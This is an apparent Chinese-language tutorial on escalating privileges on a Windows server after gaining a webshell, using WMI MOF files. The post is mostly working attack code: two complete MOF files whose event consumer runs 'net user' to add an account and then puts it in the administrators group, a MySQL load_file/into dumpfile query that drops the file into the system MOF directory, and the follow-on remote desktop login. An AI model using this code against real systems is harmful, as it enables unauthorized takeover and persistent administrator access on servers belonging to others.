- 拿下webshell之后当前权限仅限于对网站文件的操作,想要获取对主机的操作还需进一步提权
- 首先介绍mof提权,直接案例演示
- 找一个可写目录上传mof文件,我这里上传到了 C:/wmpub/nullevt.mof 代码如下
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin.admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
-
其中的添加用户命令,上传前请自己更改。(不改默认就添加admin)
1.jpg - 执行load_file及into dumpfile把文件导出到正确的位置
select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
2.jpg
- 执行成功,查看用户(我添加的waitalone)
net user
3.jpg
-
已经成功添加用户,但此时还是普通用户,并没有添加到管理员
4.jpg - 接下来把语句改一下改成添加为管理组,重复上次的步骤
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe localgroup administrators admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
5.jpg
- 此时已经是管理组了,远程桌面连接
mstsc /admin
